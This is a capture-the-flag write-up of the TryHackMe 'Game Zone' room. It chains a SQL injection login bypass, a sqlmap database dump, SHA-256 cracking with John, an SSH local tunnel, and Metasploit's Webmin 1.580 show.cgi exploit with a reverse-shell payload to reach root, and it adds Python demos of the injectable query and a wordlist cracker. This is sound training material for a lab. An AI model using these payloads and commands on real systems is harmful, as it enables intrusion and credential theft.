Hacking the Game Zone – SQLi, SSH Tunnels, and Root Access

The TryHackMe room Game Zone was a great opportunity to revisit some fundamental offensive techniques in a very streamlined and accessible environment. Compared to some of the rooms I’ve completed recently (especially the one I tackled yesterday, which was notably more complex and time-consuming), this box was relatively easy and quick to get through. Still, it was packed with essential skills that are worth mastering and revisiting regularly.
This post walks through my approach step by step, explaining what I did, why I did it, and how each tool contributed to gaining full root access on the machine.
Full Port Scan and Surface Enumeration
To begin, I performed a comprehensive port scan using:
nmap -sC -sV -T4 -p- <target-IP>
This command enables default script scanning (-sC), version detection (-sV), a faster timing template (-T4), and includes all 65,535 TCP ports (-p-). Note that this covers TCP only; UDP services would need a separate -sU scan. The goal here was to uncover not only the standard services but also any hidden or uncommon services that might be running on higher ports. Enumeration is a critical phase of any engagement, and skipping this step or doing it hastily can easily cause you to miss exploitable services.
The results were straightforward:
- Port 22 (SSH) running OpenSSH 7.2p2
- Port 80 (HTTP) hosting Apache 2.4.18
While this doesn’t look like much, it’s often all you need. A web server and SSH access can be enough to take full control if misconfigurations or vulnerabilities exist.
Web Recon and SQL Injection Discovery
Navigating to the web interface, I was met with a slick game-themed login page, clearly inspired by the Hitman series. There were no obvious navigation elements, and the page consisted almost entirely of a login prompt. I checked the source code, inspected network activity, and tried a few basic interactions to see how the form was structured.
Given the context and the way the form behaved (especially the way error messages were displayed), it was a strong candidate for SQL injection.
A bit later in the room, it was confirmed that the underlying SQL query was something like:
SELECT * FROM users WHERE username = :username AND password = :password
With this in mind, I tried classic bypass techniques such as:
- Username: admin
- Password: ' OR 1=1 --
And it worked. I was redirected to a new page (portal.php), confirming that SQL injection was possible. The reason it works is operator precedence: once the password value is spliced into the query text, the WHERE clause reads username = 'admin' AND password = '' OR 1=1, with the trailing quote commented out by --. AND binds tighter than OR, so the OR 1=1 branch makes the condition true for every row regardless of what username or password was supplied.
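To make the bypass concrete, here is an added example (not code from the room or from this post) that builds the injectable login query the way the vulnerable application must be doing it, runs it against a constructed in-memory SQLite users table, and compares it with the parameterized form. The query quoted above uses named placeholders; if the application really bound them as parameters the payload could not have worked, so the vulnerable function below interpolates the inputs into the SQL string instead. Table contents, the function names and the use of SQLite rather than MySQL are all assumptions for the demonstration.

```python
import sqlite3

# Constructed stand-in for the room's users table; not the real data.
SEED_USERS = [("agent47", "videogamer124"), ("alice", "s3cret")]


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database with a small constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SEED_USERS)
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """Splice user input straight into the SQL text: the injectable pattern."""
    return (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """Return the first matching username, or None. Injectable by construction."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    """Same logic with bound parameters: the driver never treats input as SQL."""
    row = conn.execute(
        "SELECT username FROM users "
        "WHERE username = :username AND password = :password",
        {"username": username, "password": password},
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 --"
    # Show the query the database actually receives after interpolation.
    print(build_vulnerable_query("admin", payload))
    print("vulnerable   :", vulnerable_login(db, "admin", payload))  # a real user
    print("parameterized:", safe_login(db, "admin", payload))        # None
```

The printed query ends in password = '' OR 1=1 --', which SQLite (like MySQL) evaluates as true for every row because the rest of the line is a comment. The parameterized version sends the payload as a plain string value, so it simply fails to match any password.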
Dumping the Database with SQLMap
At this point, I switched from manual testing to automation using one of my favorite tools: SQLMap.
If you haven’t used SQLMap before, it’s honestly one of the most powerful and time-saving tools available for SQL injection exploitation. It takes a single vulnerable request and systematically determines the injection point, DBMS type, enumerates databases, tables, and even dumps full credentials if available. The flexibility, power, and sheer number of features make SQLMap a must-have in any pentester's toolkit.
I captured the login POST request using Burp Suite, saved it as request.txt, and ran:
sqlmap -r request.txt --dbms=mysql --dump
SQLMap handled everything. It discovered the vulnerable parameter, confirmed the backend database was MySQL, and dumped the contents. In the users table, I found a hash:
- Username: agent47
- Password hash: a 64-character hexadecimal string, consistent with an unsalted SHA-256 digest
- Other table discovered: post
Having a user account is only half the battle. Now I needed to crack that hash.
Cracking the Hash with JohnTheRipper
For cracking, I turned to JohnTheRipper, a reliable password cracker that's especially effective when used with comprehensive wordlists like rockyou.txt.
I added the SHA256 hash to a file named hash.txt and ran:
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
The --format flag matters here: a bare 64-character hex string is ambiguous (several hash types produce that length), so telling John it is an unsalted SHA-256 avoids a wrong guess and a wasted run.
John quickly returned the cracked password:
- Password: videogamer124
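The following is an added example, not part of the original post, that shows what the Raw-SHA256 mode of John is doing under the hood: hash each wordlist candidate once and compare against every pending target. The wordlist is a constructed handful of entries standing in for rockyou.txt, and the target digest is computed from the cracked password rather than copied from the room, so the example runs offline.

```python
import hashlib
from typing import Dict, Iterable

# Constructed wordlist standing in for rockyou.txt (a few entries, not the real file).
WORDLIST = ["123456", "password", "hitman", "videogamer", "videogamer124", "agent47"]

HEX_DIGITS = set("0123456789abcdef")


def sha256_hex(candidate: str) -> str:
    """Unsalted SHA-256 of the candidate as lowercase hex, i.e. John's Raw-SHA256."""
    return hashlib.sha256(candidate.encode("utf-8")).hexdigest()


def crack_raw_sha256(target_hexes: Iterable[str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Single pass over the wordlist against all targets, like john with a hash file.

    Returns {digest: plaintext} for every target that was recovered.
    """
    pending = set()
    for h in target_hexes:
        h = h.strip().lower()
        if len(h) != 64 or set(h) - HEX_DIGITS:
            raise ValueError(f"not a SHA-256 hex digest: {h!r}")
        pending.add(h)

    found: Dict[str, str] = {}
    for word in wordlist:
        word = word.rstrip("\r\n")  # wordlist files carry line endings
        digest = sha256_hex(word)
        if digest in pending:
            found[digest] = word
            pending.discard(digest)
            if not pending:
                break  # nothing left to crack, stop early
    return found


# The room's hash for agent47 is not reproduced here; the target digest is derived
# from the cracked password so the example stays self-contained.
TARGET_HASH = sha256_hex("videogamer124")

if __name__ == "__main__":
    for digest, plaintext in crack_raw_sha256([TARGET_HASH], WORDLIST).items():
        print(f"{digest}:{plaintext}")
```

Hashing each candidate exactly once and looking it up in a set is why adding more target hashes costs almost nothing; the expensive part is the wordlist pass, and an unsalted fast hash like SHA-256 makes that pass cheap for the attacker.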
This gave me a complete set of valid SSH credentials:
ssh agent47@10.10.95.193
And I was in – logged in as a low-privileged user on the box.
Discovering a Service on a Blocked Port
After getting a shell, my next task was local enumeration. I wanted to see what was running on the system and what might be exposed internally.
I used:
ss -tulpn
This command lists all listening TCP and UDP sockets along with the owning process. That's when I saw something interesting: a service on port 10000 bound only to localhost (127.0.0.1), which is why the external port scan never showed it. A socket bound to the loopback address cannot be reached from another host at all, regardless of firewall rules; had it been bound to 0.0.0.0 and still invisible from outside, a host firewall dropping the port would have been the likely explanation. Either way, I needed a path to it that originated on the box itself.
SSH Tunneling to Reach Internal Services
To reach this internal service, I used SSH local port forwarding (-L). It binds a port on my machine and relays every connection made to it through the SSH session to a destination that is resolved on the target side, so "localhost" in the forward specification means the target's own loopback interface, exactly where the service was listening. I executed the following command from my AttackBox terminal:
ssh -L 10000:localhost:10000 agent47@10.10.95.193
This opened localhost:10000 on my machine and forwarded everything sent to it to port 10000 on the target's loopback. Opening a browser and visiting http://localhost:10000 now connected me to the internal service.
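As an added example covering both the ss enumeration step and the tunnel step above (this is not code from the post), the script below parses ss -tulpn output, flags TCP listeners bound to a loopback address as the ones an external scan can never see, and builds the matching ssh -L command. The ss output is constructed to resemble what the box showed; the process names, PIDs and file descriptors in it are made up for the demonstration.

```python
import re
from ipaddress import ip_address
from typing import Dict, List, Optional

# Constructed ss -tulpn output modelled on the box; pids/fds are invented.
SAMPLE_SS_OUTPUT = """\
Netid  State   Recv-Q  Send-Q     Local Address:Port   Peer Address:Port  Process
udp    UNCONN  0       0                0.0.0.0:68          0.0.0.0:*      users:(("dhclient",pid=800,fd=6))
tcp    LISTEN  0       128              0.0.0.0:22          0.0.0.0:*      users:(("sshd",pid=1072,fd=3))
tcp    LISTEN  0       128            127.0.0.1:10000       0.0.0.0:*      users:(("miniserv.pl",pid=1234,fd=5))
tcp    LISTEN  0       128                 [::]:80             [::]:*      users:(("apache2",pid=1100,fd=4))
tcp    LISTEN  0       128                 [::]:22             [::]:*      users:(("sshd",pid=1072,fd=4))
"""

PROCESS_RE = re.compile(r'\("([^"]+)"')  # first process name inside users:(("name",pid=..))


def parse_ss(text: str) -> List[Dict]:
    """Turn ss -tulpn lines into dicts with proto, state, addr, port and process."""
    rows = []
    for line in text.splitlines()[1:]:  # first line is the column header
        parts = line.split()
        if len(parts) < 6:
            continue
        proto, state, local = parts[0], parts[1], parts[4]
        addr, port = local.rsplit(":", 1)     # IPv6 locals look like [::]:80
        match = PROCESS_RE.search(line)
        rows.append({
            "proto": proto,
            "state": state,
            "addr": addr.strip("[]"),
            "port": int(port),
            "process": match.group(1) if match else None,
        })
    return rows


def is_loopback_only(addr: str) -> bool:
    """True when the socket is bound to a loopback address (127.0.0.0/8 or ::1)."""
    if addr in ("*", ""):
        return False  # ss prints * for any-address binds
    try:
        return ip_address(addr).is_loopback
    except ValueError:
        return False


def tunnel_candidates(rows: List[Dict]) -> List[Dict]:
    """TCP listeners that only local clients can reach, i.e. what an SSH tunnel unlocks."""
    return [
        r for r in rows
        if r["proto"] == "tcp" and r["state"] == "LISTEN" and is_loopback_only(r["addr"])
    ]


def local_forward_command(user: str, host: str, port: int, local_port: Optional[int] = None) -> str:
    """ssh -L spec: bind local_port here, deliver to the target's loopback on port."""
    local_port = local_port or port
    return f"ssh -L {local_port}:localhost:{port} {user}@{host}"


if __name__ == "__main__":
    for cand in tunnel_candidates(parse_ss(SAMPLE_SS_OUTPUT)):
        print(f"loopback-only {cand['process']} on {cand['addr']}:{cand['port']}")
        print("  ", local_forward_command("agent47", "10.10.95.193", cand["port"]))
```

The 0.0.0.0 and [::] binds for SSH and Apache are skipped because the external nmap scan already covers those; the only row that earns a tunnel is the loopback-only listener on 10000.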
What I found was Webmin – a web-based system administration interface. More importantly, it was running version 1.580, which is known to have a few historical remote command execution vulnerabilities.
Finding a Vulnerability in Webmin
I searched Exploit-DB and quickly came across this entry:
Webmin 1.580 - /file/show.cgi Remote Command Execution (Metasploit)
This vulnerability (CVE-2012-2982) affects the exact version I found. It allows an authenticated user with access to the File Manager module to execute arbitrary system commands via a crafted request to show.cgi, and because Webmin's web server runs as root, those commands run as root as well.
Because I already had valid credentials, this exploit fit the situation perfectly.
Gaining Root Access with Metasploit
I launched Metasploit and configured the exploit module:
use exploit/unix/webapp/webmin_show_cgi_exec
set RHOSTS 127.0.0.1
set RPORT 10000
set SSL false
set USERNAME agent47
set PASSWORD videogamer124
set PAYLOAD cmd/unix/reverse
set LHOST <my AttackBox IP>
set LPORT 4444
I also started a Netcat listener to catch the shell:
nc -nlvp 4444
A separate Netcat listener on the same port isn't strictly required: when the module runs, Metasploit starts its own handler for the reverse payload on LHOST:LPORT, and a second listener on that port will contend with it for the socket.
Then I launched the exploit:
run
A few seconds later, I received a reverse shell as root. This was possible because Webmin's miniserv.pl process runs as root, so anything executed through show.cgi inherits that privilege.
Collecting the Final Flag
From the reverse shell, I confirmed access:
whoami
The output:
root
From there, I navigated to /root/ and collected the root flag:
cat /root/root.txt
Flag captured. Room complete.
Final Thoughts
Game Zone is a great example of how a chain of simple vulnerabilities can lead to full system compromise. While the room wasn’t particularly challenging compared to some of the others I’ve done recently, it was extremely satisfying and well-paced.
Here’s what made it especially valuable:
- Repetition of SQL injection principles
- Use of SQLMap – seriously, this tool is phenomenal. It automates enumeration, exploitation, and data extraction, and even handles things like tamper scripts, custom headers, and authentication.
- Practical password cracking with JohnTheRipper
- Hands-on experience with SSH tunneling to access restricted internal services
- Real-world Webmin exploitation using Metasploit
In real environments, these attack paths are surprisingly common. Misconfigured admin panels, outdated packages, reused credentials, and weak internal isolation can create exactly this kind of scenario. The room makes for excellent practice and is perfect for beginners and intermediate learners alike.
Highly recommend.